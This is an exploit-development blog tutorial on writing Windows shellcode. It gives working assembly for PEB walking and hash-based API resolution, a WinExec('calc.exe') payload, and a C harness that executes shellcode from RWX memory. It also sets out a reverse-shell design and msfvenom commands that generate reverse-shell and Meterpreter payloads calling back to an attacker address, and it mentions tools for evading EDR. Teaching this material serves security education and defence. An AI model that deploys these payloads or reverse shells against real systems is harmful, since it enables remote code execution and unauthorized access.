Thilan Dissanayaka Exploit Development April 22, 2020

Writing Shellcode for Windows

In the Linux shellcode article, we wrote shellcode that called the kernel directly — load registers, trigger int 0x80, done. The kernel’s syscall interface is stable, documented, and numbered. Syscall 11 is always execve. Syscall 1 is always exit.

Windows doesn’t work that way.

Windows syscall numbers change between versions — even between service packs. The syscall for NtCreateFile might be 0x55 on Windows 7 and 0x56 on Windows 10. Microsoft considers the syscall interface private and undocumented. You’re supposed to go through the Win32 API — kernel32.dll, ntdll.dll, user32.dll.

This means Windows shellcode must:

Find where kernel32.dll is loaded in memory — at runtime, without hardcoding addresses
Parse kernel32.dll’s export table — walk the PE structure to find function addresses
Resolve the API functions it needs — WinExec, LoadLibraryA, GetProcAddress, etc.
Call those functions — finally do something useful

This is significantly more complex than Linux shellcode. But it’s also more elegant — once you understand PEB walking and export parsing, you can call any Windows API function from position-independent shellcode.

The Architecture — Why PEB Walking?

When a Windows process starts, the OS loads several DLLs into its address space. The most important for shellcode:

DLL	Why We Need It
kernel32.dll	Contains `WinExec`, `LoadLibraryA`, `GetProcAddress`, `ExitProcess`
ntdll.dll	Low-level NT functions, always loaded first
ws2_32.dll	WinSock — needed for reverse shells (not loaded by default)

The problem: ASLR randomizes where these DLLs load. We can’t hardcode WinExec = 0x7C8623AD — that address changes every boot.

The solution: every Windows process has a Process Environment Block (PEB) — a data structure that contains, among other things, a linked list of all loaded modules (DLLs) and their base addresses. The PEB is always accessible via a fixed CPU segment register.

TEB (Thread Environment Block)
  ↓ offset 0x30
PEB (Process Environment Block)
  ↓ offset 0x0C
PEB_LDR_DATA
  ↓ offset 0x14
InMemoryOrderModuleList (doubly-linked list)
  → ntdll.dll
  → kernel32.dll (or kernelbase.dll)
  → ...other loaded DLLs

From any thread, at any time, regardless of ASLR:

mov eax, fs:[0x30]    ; EAX = PEB address (always works, 32-bit)
; On 64-bit: mov rax, gs:[0x60]

That’s the entry point. From the PEB, we walk the module list to find kernel32.dll’s base address. From kernel32.dll’s base, we parse the PE export table to find function addresses.

Step 1: Finding kernel32.dll via PEB

The PEB Structure (Relevant Fields)

PEB (at fs:[0x30]):
  +0x00  InheritedAddressSpace
  +0x08  ImageBaseAddress
  +0x0C  Ldr  →  PEB_LDR_DATA
         ...

PEB_LDR_DATA:
  +0x0C  InLoadOrderModuleList
  +0x14  InMemoryOrderModuleList  ← We use this one
  +0x1C  InInitializationOrderModuleList

Each list entry (LDR_DATA_TABLE_ENTRY via InMemoryOrderModuleList):
  +0x00  InMemoryOrderLinks.Flink  (next entry)
  +0x08  InMemoryOrderLinks.Blink  (previous entry)
  +0x10  DllBase                   ← The DLL's base address in memory
  +0x18  EntryPoint
  +0x20  SizeOfImage
  +0x28  FullDllName (UNICODE_STRING)
  +0x30  BaseDllName (UNICODE_STRING)

The InMemoryOrderModuleList is a doubly-linked list of all loaded modules. The order is:

The executable itself (e.g., vulnerable.exe)
ntdll.dll
kernel32.dll (or kernelbase.dll on Win7+)

So to find kernel32.dll, we follow the list: skip the first entry (the exe), skip the second (ntdll), and the third is kernel32.

Assembly: Walking the PEB

; Find kernel32.dll base address
; 32-bit Windows

    xor ecx, ecx
    mov eax, fs:[ecx+0x30]     ; EAX = PEB
    mov eax, [eax+0x0C]        ; EAX = PEB->Ldr (PEB_LDR_DATA)
    mov esi, [eax+0x14]        ; ESI = InMemoryOrderModuleList.Flink (first entry)
    lodsd                       ; EAX = second entry (ntdll.dll)
    xchg eax, esi              ; ESI = second entry
    lodsd                       ; EAX = third entry (kernel32.dll)
    mov ebx, [eax+0x10]        ; EBX = kernel32.dll base address!

Let’s trace this:

fs:[0x30] gives us the PEB
PEB+0x0C gives us PEB_LDR_DATA
PEB_LDR_DATA+0x14 gives us the first entry in InMemoryOrderModuleList (the .exe)
First lodsd (loads dword at ESI into EAX, advances ESI) moves to the second entry (ntdll.dll)
Second lodsd moves to the third entry (kernel32.dll)
Entry+0x10 gives us the DllBase — kernel32.dll’s base address

EBX now contains kernel32.dll’s base address. This works regardless of ASLR.

Note on Modern Windows

On Windows 7+, kernelbase.dll sometimes appears before kernel32.dll in the list. kernelbase.dll exports many of the same functions. For maximum compatibility, some shellcode walks the list and checks the module name — but for simplicity, the third-entry assumption works for most cases.

Step 2: Parsing the PE Export Table

Now that we have kernel32.dll’s base address, we need to find specific functions within it. DLLs are PE (Portable Executable) files, and their exported functions are listed in the Export Directory.

PE Structure (from the base address)

Base Address (EBX):
  +0x3C  e_lfanew → offset to PE signature

PE Signature:
  +0x00  "PE\0\0"
  +0x78  Export Directory RVA (Relative Virtual Address)

Export Directory:
  +0x18  NumberOfNames
  +0x1C  AddressOfFunctions   (RVA array of function addresses)
  +0x20  AddressOfNames       (RVA array of function name pointers)
  +0x24  AddressOfNameOrdinals (RVA array of ordinal values)

The export resolution process:

Walk the AddressOfNames array — compare each name to the function we’re looking for
When we find a match at index i — read the ordinal from AddressOfNameOrdinals[i]
Use the ordinal to index into AddressOfFunctions — that gives us the function’s RVA
Add the DLL base address to the RVA — that’s the actual function address

Assembly: Finding a Function by Name

This is the core routine of every Windows shellcode. We’ll write a function that takes a DLL base address and a function name hash, and returns the function address.

Why Hashing?

Comparing strings byte-by-byte in shellcode is bulky. Instead, we compute a hash of each export name and compare it to a pre-computed hash of the function we want. This saves space significantly.

The most common hash algorithm in shellcode is a simple rotate-and-add:

; Hash function: ROR13 + ADD
; Input: ESI = pointer to ASCII string
; Output: EDX = hash

compute_hash:
    xor edx, edx
.hash_loop:
    lodsb                       ; AL = next byte, ESI++
    test al, al
    jz .hash_done
    ror edx, 13                 ; Rotate right by 13
    add edx, eax               ; Add character value
    jmp .hash_loop
.hash_done:
    ret

Pre-compute the hash for WinExec:

def ror13_hash(name):
    h = 0
    for c in name:
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + ord(c)) & 0xFFFFFFFF
    return h

print(hex(ror13_hash("WinExec")))          # 0x0E8AFE98
print(hex(ror13_hash("ExitProcess")))       # 0x7ED8E273
print(hex(ror13_hash("LoadLibraryA")))      # 0x0726774C
print(hex(ror13_hash("GetProcAddress")))    # 0x7C0DFCAA

Assembly: Complete Export Resolution

; find_function: Resolve a function from a DLL by hash
; Input:  EBX = DLL base address
;         EDX = hash of function name to find
; Output: EAX = function address

find_function:
    pushad
    mov eax, [ebx+0x3C]        ; e_lfanew (offset to PE header)
    mov edi, [ebx+eax+0x78]    ; Export Directory RVA
    add edi, ebx               ; EDI = Export Directory absolute address
    mov ecx, [edi+0x18]        ; ECX = NumberOfNames
    mov eax, [edi+0x20]        ; AddressOfNames RVA
    add eax, ebx               ; EAX = AddressOfNames absolute

.find_loop:
    jecxz .find_fail            ; If no more names, fail
    dec ecx
    mov esi, [eax+ecx*4]       ; ESI = RVA of name[ecx]
    add esi, ebx               ; ESI = absolute address of name string

    ; Compute hash of this export name
    xor edx, edx
.hash_loop:
    lodsb
    test al, al
    jz .hash_done
    ror edx, 13
    add edx, eax
    jmp .hash_loop

.hash_done:
    cmp edx, [esp+0x24]        ; Compare with our target hash (saved on stack)
    jnz .find_loop              ; No match, try next name

    ; Match found! Get the function address
    mov eax, [edi+0x24]        ; AddressOfNameOrdinals RVA
    add eax, ebx
    mov cx, [eax+ecx*2]        ; CX = ordinal for this name
    mov eax, [edi+0x1C]        ; AddressOfFunctions RVA
    add eax, ebx
    mov eax, [eax+ecx*4]       ; EAX = function RVA
    add eax, ebx               ; EAX = function absolute address!

    mov [esp+0x1C], eax        ; Store result (overwrite saved EAX in pushad frame)
    popad
    ret

.find_fail:
    popad
    xor eax, eax
    ret

Step 3: Putting It All Together — WinExec Shellcode

Now we combine PEB walking + export resolution + the actual payload.

Complete WinExec(“calc.exe”) Shellcode

[BITS 32]

    cld                         ; Clear direction flag

; ===== FIND KERNEL32.DLL =====
    xor ecx, ecx
    mov eax, fs:[ecx+0x30]     ; PEB
    mov eax, [eax+0x0C]        ; PEB->Ldr
    mov esi, [eax+0x14]        ; InMemoryOrderModuleList
    lodsd                       ; Skip exe entry → ntdll
    xchg eax, esi
    lodsd                       ; Skip ntdll → kernel32
    mov ebx, [eax+0x10]        ; EBX = kernel32.dll base

; ===== FIND WinExec =====
    mov edx, 0x0E8AFE98        ; Hash of "WinExec"
    call find_function          ; EAX = WinExec address
    mov edi, eax               ; Save WinExec address in EDI

; ===== FIND ExitProcess =====
    mov edx, 0x7ED8E273        ; Hash of "ExitProcess"
    call find_function          ; EAX = ExitProcess address
    mov esi, eax               ; Save ExitProcess address in ESI

; ===== CALL WinExec("calc.exe", 0) =====
    xor ecx, ecx
    push ecx                   ; null terminator
    push 0x6578652E            ; ".exe"
    push 0x636C6163            ; "calc"
    mov eax, esp               ; EAX = pointer to "calc.exe\0" on stack

    push ecx                   ; uCmdShow = 0 (SW_HIDE)
    push eax                   ; lpCmdLine = "calc.exe"
    call edi                   ; Call WinExec("calc.exe", 0)

; ===== CALL ExitProcess(0) =====
    xor ecx, ecx
    push ecx                   ; Exit code = 0
    call esi                   ; Call ExitProcess(0)


; ===== FIND_FUNCTION SUBROUTINE =====
find_function:
    pushad
    mov eax, [ebx+0x3C]
    mov edi, [ebx+eax+0x78]
    add edi, ebx
    mov ecx, [edi+0x18]
    mov eax, [edi+0x20]
    add eax, ebx

.find_loop:
    jecxz .find_fail
    dec ecx
    mov esi, [eax+ecx*4]
    add esi, ebx

    xor edx, edx
.hash_loop:
    lodsb
    test al, al
    jz .hash_compare
    ror edx, 13
    add edx, eax
    jmp .hash_loop

.hash_compare:
    cmp edx, [esp+0x24]
    jnz .find_loop

    mov eax, [edi+0x24]
    add eax, ebx
    mov cx, [eax+ecx*2]
    mov eax, [edi+0x1C]
    add eax, ebx
    mov eax, [eax+ecx*4]
    add eax, ebx
    mov [esp+0x1C], eax
    popad
    ret

.find_fail:
    popad
    xor eax, eax
    ret

Compiling and Testing

# Assemble
$ nasm -f bin shellcode.asm -o shellcode.bin

# Check for null bytes (must be zero!)
$ xxd shellcode.bin | grep " 00 "

# Extract as hex string
$ xxd -p shellcode.bin | tr -d '\n'

# Check size
$ wc -c shellcode.bin

The C Test Harness

#include <stdio.h>
#include <windows.h>

unsigned char shellcode[] =
"\xfc\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14"
"\xad\x96\xad\x8b\x58\x10..."  // (full shellcode bytes here)
;

int main() {
    printf("Shellcode length: %d\n", sizeof(shellcode) - 1);

    // Allocate executable memory
    void *exec = VirtualAlloc(NULL, sizeof(shellcode),
                              MEM_COMMIT | MEM_RESERVE,
                              PAGE_EXECUTE_READWRITE);

    memcpy(exec, shellcode, sizeof(shellcode));

    // Execute
    ((void(*)())exec)();

    return 0;
}

Compile with:

> gcc -o test test.c -m32
> test.exe

Calculator should pop up.

Avoiding Null Bytes

Just like Linux shellcode, null bytes (\x00) terminate C strings and break many exploit delivery mechanisms. Common null byte sources and fixes:

Problem	Contains Null	Fix
`mov eax, 0`	`\xB8\x00\x00\x00\x00`	`xor eax, eax`
`push 0`	`\x6A\x00`	`xor ecx, ecx; push ecx`
`mov eax, 0x0E8AFE98`	May contain `\x00`	Check — this one doesn’t
String “calc.exe\0”	Null terminator	Push null via `xor ecx,ecx; push ecx` before pushing the string
`push 0x00636C61`	Leading zero byte	Use `push 0x61636C63` and rearrange, or encode differently

The string pushing technique:

; Push "calc.exe\0" onto the stack (no null bytes in the code)
xor ecx, ecx
push ecx                   ; Push null terminator (\0)

; "calc.exe" = 63 61 6C 63 2E 65 78 65
; In little-endian dwords:
push 0x6578652E            ; ".exe" (backwards: 2E 65 78 65)
push 0x636C6163            ; "calc" (backwards: 63 61 6C 63)

mov eax, esp               ; EAX points to "calc.exe\0"

Each push puts 4 bytes on the stack in little-endian order. The null terminator is pushed first (via push ecx where ECX=0).

Reverse Shell Shellcode

A calculator pop is a proof of concept. For real exploitation, we need a reverse shell. This requires loading ws2_32.dll (WinSock), which isn’t loaded by default.

The Strategy

Find kernel32.dll → resolve LoadLibraryA and GetProcAddress
Call LoadLibraryA("ws2_32.dll") → load WinSock
Use GetProcAddress to find: WSAStartup, WSASocketA, connect
Initialize WinSock, create a socket, connect to the attacker
Redirect stdin/stdout/stderr to the socket
Spawn cmd.exe

Shellcode flow:
PEB → kernel32.dll base
  → LoadLibraryA("ws2_32.dll") → ws2_32.dll base
  → WSAStartup(0x0202, &wsadata)
  → WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0)
  → connect(sock, {AF_INET, port, IP}, 16)
  → CreateProcessA("cmd.exe", ..., stdin=sock, stdout=sock, stderr=sock)

This is substantially more complex than Linux reverse shell shellcode (which is ~70 bytes using raw syscalls). Windows reverse shell shellcode is typically 300-500 bytes due to the PEB walking, export resolution, and WinSock setup overhead.

In practice, most exploit developers use msfvenom to generate Windows shellcode:

# Windows reverse shell shellcode
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 \
    -f c -a x86 --platform windows -b "\x00"

# Windows Meterpreter (staged)
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 \
    -f c -a x86 --platform windows -b "\x00"

# Exec calc.exe (proof of concept)
$ msfvenom -p windows/exec CMD=calc.exe \
    -f c -a x86 --platform windows -b "\x00"

But understanding how it works under the hood — PEB walking, export parsing, API resolution — is essential for writing custom payloads, debugging failed exploits, and analyzing malware.

Linux vs Windows Shellcode — Complete Comparison

Aspect	Linux	Windows
Syscall interface	Stable, numbered (`int 0x80` / `syscall`)	Unstable, undocumented (changes per version)
How to call OS	Load registers, trigger interrupt	Must find and call DLL functions dynamically
Finding functions	Not needed — syscall numbers are fixed	Walk PEB → parse PE exports → resolve by hash
Position independence	`jmp-call-pop` for data references	PEB walking is inherently position-independent
Typical size (shell)	25-50 bytes	200-500 bytes
Null byte avoidance	Same techniques	Same techniques
Reverse shell size	70-100 bytes	300-500 bytes
Complexity	Simple (register + interrupt)	Complex (PEB + PE parsing + API calls)
Key skill	Understanding syscall ABI	Understanding PE format and Windows internals
Encoding	`shikata_ga_nai`, XOR	Same encoders work

The size difference is dramatic. A Linux execve("/bin/sh") shellcode is 21 bytes. The equivalent Windows shellcode (finding kernel32, resolving WinExec, calling it) is ~150+ bytes minimum. This is entirely due to the extra work of dynamic API resolution.

Debugging Shellcode with x32dbg

When shellcode doesn’t work (and it often doesn’t on the first try), x32dbg is your best friend.

Method 1: Test Harness

Compile the C test harness (above), load it in x32dbg, and step through:

Set breakpoint at the VirtualAlloc return
After VirtualAlloc, note the allocated memory address
Set breakpoint at the call to the shellcode (the function pointer call)
Step into — you're now inside your shellcode
Step through instruction by instruction
Watch registers and the stack at each step

Method 2: Inject into a Process

Load target process in x32dbg
Allocate memory: right-click memory map → Allocate Memory
Write shellcode bytes to the allocated region
Set EIP to the shellcode address
Step through

Key Things to Watch

EBX after PEB walk — Does it contain a valid kernel32.dll base? (Should look like 0x7xxx0000)
The export table parse — Is EDI pointing to a valid Export Directory? Check with Memory Map to verify it’s within kernel32.dll’s range.
The hash comparison — Set a conditional breakpoint on the cmp instruction to catch when your target hash matches.
The function address — After find_function returns, is EAX a valid code address within kernel32.dll?
The stack before API calls — Are arguments in the right order? Is the stack aligned?

Resource	Purpose
msfvenom	Generate Windows shellcode for any payload
Donut	Convert .NET assemblies and PE files into position-independent shellcode
SysWhispers	Generate direct syscall stubs (bypass API hooking by EDR)
Shellcode compiler (scc)	Compile C code into position-independent shellcode
PE-bear	GUI PE parser — helps understand DLL structures
Windows Internals (book)	Deep dive into PEB, TEB, and loader internals

Final Thoughts

Windows shellcode is harder than Linux shellcode. There’s no way around it. The PEB walking, PE export parsing, and dynamic API resolution add complexity that simply doesn’t exist on Linux. A Linux shellcode writer thinks about registers and syscall numbers. A Windows shellcode writer thinks about PE structures, linked lists, and hash-based function resolution.

But this complexity is also what makes it interesting. The PEB walk is an elegant solution to a real problem — finding code at runtime without any hardcoded addresses. It’s the same technique that malware uses to resolve API functions dynamically (making static analysis harder). Understanding it gives you insight into both offensive and defensive security on Windows.

If you’ve followed the Linux and Windows exploit development series to this point — from basic GDB reversing through stack overflows, ret2libc, and now shellcode internals — you have a solid foundation in low-level exploitation on both platforms.

Happy reversing!